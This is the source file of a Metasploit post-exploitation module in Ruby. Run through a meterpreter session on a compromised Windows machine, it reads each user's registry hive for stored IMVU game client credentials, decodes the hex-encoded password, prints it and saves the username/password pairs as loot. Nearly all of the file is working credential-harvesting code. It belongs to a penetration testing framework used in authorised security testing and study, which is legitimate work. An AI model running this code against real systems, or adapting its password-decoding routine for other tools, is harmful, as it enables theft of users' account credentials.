metasploit-framework/modules/post/windows/gather/credentials/imvu.rb

95 lines
2.3 KiB
Ruby
Raw Normal View History

##
# $Id: enum_imvu.rb 14100 2011-10-28 18:00:10Z thelightcosine $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'msf/core/post/windows/registry'
require 'msf/core/post/windows/user_profiles'
class Metasploit3 < Msf::Post
include Msf::Post::Windows::Registry
include Msf::Auxiliary::Report
include Msf::Post::Windows::UserProfiles
def initialize(info = {})
super(update_info(info,
2012-02-20 18:34:35 +00:00
'Name' => 'Windows Gather Credentials IMVU Game Client',
'Description' => %q{
This module extracts account username & password from the IMVU game client
and stores it as loot.
},
'Author' =>
[
'Shubham Dawra <shubham2dawra[at]gmail.com>' # www.SecurityXploded.com
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 14100 $',
'Platform' => [ 'windows' ],
'SessionTypes' => [ 'meterpreter' ]
))
end
def run
creds = Rex::Ui::Text::Table.new(
'Header' => 'IMVU Credentials',
'Indent' => 1,
'Columns' =>[
'User',
'Password'
]
)
credcount=0
userhives=load_missing_hives()
userhives.each do |hive|
next if hive['HKU'] == nil
vprint_status("Looking at Key #{hive['HKU']}")
subkeys = registry_enumkeys("#{hive['HKU']}\\Software\\IMVU\\")
if subkeys.nil? or subkeys.empty?
print_status ("IMVU not installed for this user.")
next
end
user = registry_getvaldata("#{hive['HKU']}\\Software\\IMVU\\username\\", "")
hpass = registry_getvaldata("#{hive['HKU']}\\Software\\IMVU\\password\\", "")
decpass = [ hpass.downcase.gsub(/'/,'').gsub(/\\?x([a-f0-9][a-f0-9])/, '\1') ].pack("H*")
print_good("User=#{user}, Password=#{decpass}")
creds << [user, decpass]
credcount = (credcount + 1)
end
#clean up after ourselves
unload_our_hives(userhives)
print_status("#{credcount} Credentials were found.")
if credcount > 0
print_status("Storing data...")
path = store_loot(
'imvu.user.creds',
'text/csv',
session,
creds.to_csv,
'imvu_user_creds.csv',
'IMVU User Credentials'
)
print_status("IMVU user credentials saved in: #{path}")
end
end
end